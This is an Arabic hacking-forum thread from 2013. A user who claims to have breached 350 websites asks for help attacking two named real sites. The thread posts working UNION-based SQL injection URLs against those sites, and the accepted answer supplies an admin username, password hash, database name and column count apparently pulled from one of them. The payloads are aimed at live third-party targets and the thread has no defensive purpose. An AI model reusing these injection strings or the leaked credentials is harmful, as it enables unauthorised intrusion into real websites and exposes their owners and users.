التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب
تحديث الصفحة مطلوووووب للاهميه عبد الصمد او اي شخص محترف ...
التعليمات التقويم مشاركات اليوم البحث

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 01-27-2013, 07:52 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
SoLiTair4Ever
::. Moderators .::
 
الصورة الرمزية SoLiTair4Ever
 

 
 
إحصائية العضو









SoLiTair4Ever غير متواجد حالياً

إرسال رسالة عبر MSN إلى SoLiTair4Ever إرسال رسالة عبر Skype إلى SoLiTair4Ever

 

 

إحصائية الترشيح

عدد النقاط : 14
SoLiTair4Ever is on a distinguished road
افتراضي مجاب: رد: مطلوووووب للاهميه عبد الصمد او اي شخص محترف ...

كود:
http://www.limacabs.com/news_desc.php?id=-7%20UNION%20%28SELECT%201,2,CONCAT_WS%28CHAR%2832,58,32%29,table_name,column_name,table_schema%29,4+from+information_schema.columns%29--
أظن انها blind SQL injection

Vspan style="font-weight: bold; color: #006400;"Cl[hf:VLspanC v]: l'g,,,,,f gghildi uf] hgwl] h, hd aow lpjvt >>>

التوقيع

.
..
...
.:: قـوانـين الـشبكة العـامة ::.
......
.:: قسـم التبلــيغ عن المواضيـع الملغومـة ::.
......
هــــآم جدآآآ

يمنع منعاً باتاً رفع الملفات على المواقع التالية:
Ge.tt - mediafire.com - 4shared.com

الأدارة وطاقم فريق العمل لايتحملون اي مسؤلية عن مصير الموضوع عند مخالفة القوانين

...
..
.

 

التعديل الأخير تم بواسطة SoLiTair4Ever ; 01-27-2013 الساعة 07:54 PM.

   

رد مع اقتباس
أفضل جواب - كتبه mido868
اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة guba.1
سلام عليكم ورحمه الله

اخواني انا واعوذ بالله من كلمه انا اخترقت 350 موقع بـ الـ sql يعني ولحمد لله متمكن من هاذي الثغره

لااكن واجهتني مشكله فـ الاونه الاخيره

وهيا مثل هاذا الموقع ...

كود PHP:
http://www.limacabs.com/news_desc.php?id=-7%20UNION%20%28SELECT%201,2,CONCAT_WS%28CHAR%2832,58,32%29,table_name,column_name,table_schema%29,4+from+information_schema.columns%29-- 
وهاذا ..
كود PHP:
http://hotelacostacentro.com/noticia.php?id=-11%27%20UNION%20SELECT%201,2,3,4,%28CONCAT_WS%28CHAR%2832,58,32%29,table_name,column_name,table_schema%29,6,7,8,9,10,11,12+from+information_schema.columns%29--%20- 
والكثير الكثير مثل هاذي المشكله

فـ اتمنى طريقة حل هاذي المشكله وطرح الطريقه لتعم الفائده الرجاء اي شخص يمر ع الموضوع يشارك ولو بظم صوته الى صوتي ..,

احترامي ,


http://hotelacostacentro.com/noticia.php?id=-11

user
admin

password
5e7cf5d0c1214aacb755776e9f6a9449



hint

table_name) of information_schema.tables where table_schema=0x61636F7374615F63656E74726F

MySQL >=5
Column Count is 12

Column is 4
DB: acosta_centro
inject type mssql
راجع دروس الاخ عبد الصمد
قديم 01-27-2013, 08:11 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية guba.1
 

 
 
إحصائية العضو







guba.1 غير متواجد حالياً

إرسال رسالة عبر Skype إلى guba.1

 

 

إحصائية الترشيح

عدد النقاط : 10
guba.1 is on a distinguished road
افتراضي رد: مطلوووووب للاهميه عبد الصمد او اي شخص محترف ...

اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة SoLiTair4Ever
كود:
http://www.limacabs.com/news_desc.php?id=-7%20UNION%20%28SELECT%201,2,CONCAT_WS%28CHAR%2832,58,32%29,table_name,column_name,table_schema%29,4+from+information_schema.columns%29--
أظن انها blind SQL injection

يعطيك العافيه اخي الكريم ع الاهتمام لااكن blind SQL injection مايكون استعلامها بـ وضع '

هاذا الي اعرفه عن الثغره هاذي لااني متعامل معها كثير

اما الموقع هاذا مصاب بـ SQL injection جربت بكل الطرق مافي امل :(

ننتظر الخبراء ,

التوقيع

Skype

guba.col.1

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

« الموضوع السابق | الموضوع التالي »

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك
BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة
الانتقال السريع


الساعة الآن 01:19 PM

:: vBspiders.Com :: RSS Feeds - راسلـنا - :: vBspiders.Com :: - الأعلى

[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0